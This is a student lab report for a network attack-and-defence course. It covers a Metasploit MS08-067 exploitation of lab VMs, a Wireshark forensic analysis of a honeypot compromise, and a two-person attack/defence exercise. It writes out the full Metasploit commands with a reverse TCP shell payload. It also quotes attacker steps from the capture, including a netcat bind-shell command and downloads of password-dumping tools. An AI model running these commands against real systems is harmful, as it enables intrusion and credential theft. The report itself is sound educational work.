20253916 2025-2026-2 《网络攻防实践》实践6报告

1.实践内容

• 一是使用 Metasploit 对靶机上的 MS08-067 漏洞进行渗透，成功获取系统权限；
  具体过程如下：
  1.前期准备与环境确认
  2.Metasploit 漏洞利用流程
  3.权限获取与验证
• 二是通过 pcap 文件对一次完整的 NT 系统破解攻击进行取证分析，还原了攻击者从漏洞利用到权限维持的全过程；
  具体过程如下：
  1.攻击者使用的破解工具
  2.攻击者如何进入并控制系统
  3.攻击者获得权限后的行为
  4.攻击的防范方法
• 三是参与了团队对抗实验，分别从攻、防两个视角体验了远程渗透与流量分析的完整流程，也更直观地感受到攻防双方的对抗节奏和信息差。
  具体过程如下：
  1.攻击方实践
  2.防守方实践

2.实践过程

2.1 动手实践 Metasploit windows attacker

设备	IP 地址
Kali（攻击机）	192.168.200.4
Win2Kserver（靶机）	192.168.200.124

• 在Kali虚拟机中启动Metasploit
  service postgresql start //启动PostgreSQL服务
  msfdb init //初始化Metasploit PostgreSQL数据库
  msfconsole //启动metasploit

• 使用命令search ms08_067搜寻漏洞情况，使用命令use windows/smb/ms08_067_netapi表明将ms08_067作为目标漏洞

• 使用命令show payloads查看有效的攻击载荷，使用命令set payload generic/shell_reverse_tcp设置攻击的载荷为tcp的反向连接

• 使用命令show options查看需要设置的参数，即攻击机与靶机的IP地址。使用命令set LHOST 192.168.200.4设置攻击机Kali；set RHOST 192.168.200.124设置靶机Win2Kserver

• 使用命令show targets查看可设置的操作系统类型，使用命令set TARGET 0表示自动识别。
  

• 输入命令exploit开始渗透，输入ipconfig可以查看靶机自己的IP地址，攻击成功

2.2 取证分析实践：解码一次成功的 NT 系统破解攻击

首先在学习通下载 demo_NT_attack_data.zip，解压后把 .log 后缀改成 .pcap，使用 wireshark 打开。

问题：

• 攻击者使用了什么破解工具进行攻击
• 攻击者如何使用这个破解工具进入并控制了系统
• 攻击者获得系统访问权限后做了什么
• 我们如何防止这样的攻击
• 你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么

使用ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http过滤数据包

• 跟踪一组数据的tcp流，找到%C0%AF，在初步探测阶段，攻击者巧妙利用了 IIS 4.0 对 Unicode 编码解析的盲区，实现跨目录跳跃，直接触及并读取了系统底层的 boot.ini 文件。

完成漏洞探测后，攻击者针对靶机的漏洞发起攻击，通过两步完成恶意代码植入：

• 发现大量针对 msadcs.dll 的 HTTP 请求，该文件为 IIS RDS 服务的核心组件。

• 跟踪 TCP 数据流

通过对 Wireshark 跟踪 TCP 流的流量报文深度分析可以看出，攻击者针对目标主机 IIS 服务器的 msadcs.dll 数据库组件接口，发起了精心构造的 HTTP POST 恶意请求。从重组后的应用层载荷中，可提取到该漏洞利用独有的!ADM!ROX!YOUR!WORLD!特征分隔符，结合流量攻击手法能够判断，本次攻击使用了公开流传的 MSADC 漏洞自动化利用脚本。该攻击利用 Windows MDAC RDS 组件存在的高危漏洞，在请求数据中注入恶意 SQL 语句，截断原有正常数据库查询逻辑，调用系统 shell 执行 cmd 命令，成功实现远程任意代码执行，不仅可以直接控制靶机系统，也为后续攻击者上传木马、内网渗透、权限提升等进一步攻击行为打开了入口。

• 对 tcp.stream eq 109 的数据流进行筛选。

攻击者通过恶意请求植入了 nc -l -p 6969 -e cmd1.exe 命令，该命令通过 netcat 工具在靶机的 6969 端口开启监听，绑定系统 cmd 命令行程序，实现反向 Shell 功能。

攻击者连接远程服务器，使用账号johna2k和密码haxedj00完成登录，成功下载了nc.exe、pdump.exe以及samdump.dll三个文件。

对 tcp.stream eq 178 的 TCP 数据流进行跟踪分析。

结合本次 TCP 流还原的完整交互流量可以看出，攻击者在成功利用 MSADC 漏洞获取靶机系统命令执行权限后，首先通过多级cd命令切换目录，逐步进入靶机 C 盘系统根目录。随后攻击者执行 echo 写入命令，向系统根目录创建 rfp.txt 文件，写入专属嘲讽语句。之后攻击者调用 dir 命令遍历靶机本地文件目录，完成对靶机系统环境的全面探测。本次攻击行为清晰表明攻击者早已识别出目标为蜜罐环境，主动留下的嘲讽文本内容，也成为攻击者完全攻陷蜜罐、洞悉蜜网部署的直接证据。

2.3 团队对抗实践

• 这个实验由我和邹亦阳同学的电脑进行演示团队对抗实验，首先将我们的电脑连在同一个局域网内。然后编辑我们的kali以及win2kServer，设置成桥接模式，勾选上复制物理地址连接状态。

把win2kServer的网络连接改为自动获取IP地址。

修改完成后，两人电脑的配置如下：

• 20253916 李承宸
  kali:192.168.43.7
  win2kServer：192.168.43.206

• 20253918 邹亦阳
  kali:192.168.43.188
  win2kServer：192.168.43.38

• 首先邹亦阳用kali攻击机去攻击我的win2kServer靶机，首先测试连通性，由下图可以看出邹亦阳的kali虚拟机可以联通我的机器。

• 他在Kali虚拟机中输入msfconsole，启动Metasploit框架控制台
  

• 对方输入指令use exploit/windows/smb/ms08_067_netapi加载MS08-067漏洞的核心利用模块。
  

• 对方输入指令show payloads列出该漏洞可兼容的攻击载荷
  

• 对方输入指令set payload generic/shell_reverse_tcp 设置反向TCP Shell载荷，输入指令set LHOST 192.168.43.188设置Kali攻击机的IP，set RHOST 192.168.43.206设置Win2kServer被攻击机的IP。

• 对方输入指令show options查看设置的信息

• 对方输入指令exploit进行攻击，攻击后可以发现已经进入了郭豪的靶机的命令行

• 对方输入指令mkdir ZYY_att_LCC在对方主机中创建文件夹

• 对方输入指令cd ZYY_att_LCC进入该文件夹

• 对方输入指令echo Hi LCC,I am ZYY.>>Test.txt在对方主机中创建一个Test.txt文件并留言如上

对方在我的电脑种的C/WINNT/system32中出现了一个ZYY_att_LCC文件夹内，文件夹内有一个Test.txt记事本文件，内容为Hi LCC,I am ZYY.

• 测试防御

在对方进行攻击我的win2kServer靶机时，我打开wireshark软件进行监听，输入ip.addr == 192.168.43.188 and ip.addr == 192.168.43.206追踪TCP数据流，可以追踪到攻击方输入的攻击指令。可以看见他先在我的电脑里创建了一个ZYY_att_LCC的文件夹，然后进入这个文件夹，创建了一个Test.txt文本文件，写入了内容为Hi LCC,I am ZYY.

• 整个团队攻防实践流程结束。

3.学习中遇到的问题及解决

• 问题1：用exploit渗透不成功
  

• 问题1解决方案：将Win2Kserver和kali放置在同一网段内即可。

4.实践总结

完成了所有预设任务，核心成果与收获如下：
熟练掌握了 Metasploit 框架的基本使用流程，能够独立完成漏洞搜索、模块配置、载荷选择和执行利用的全流程操作，成功获取靶机系统权限，理解了远程代码执行漏洞的利用原理和风险。
通过对 NT 系统破解攻击的取证分析，完整掌握了从流量文件还原攻击过程的方法，能够识别攻击工具特征、还原攻击者行为，并针对性提出防御措施，深化了攻防一体的思维。
团队对抗实践让我同时体验了攻击和防守两个视角，更直观地感受到了攻防双方的信息差和对抗节奏，也明白了流量分析在攻击溯源和安全防御中的重要作用。
同时，本次实验也暴露了自身的不足：对 Metasploit 高级模块和自定义载荷的使用还不够熟练，对复杂攻击流量的分析能力还有待提升，后续需要针对性加强相关内容的学习和练习。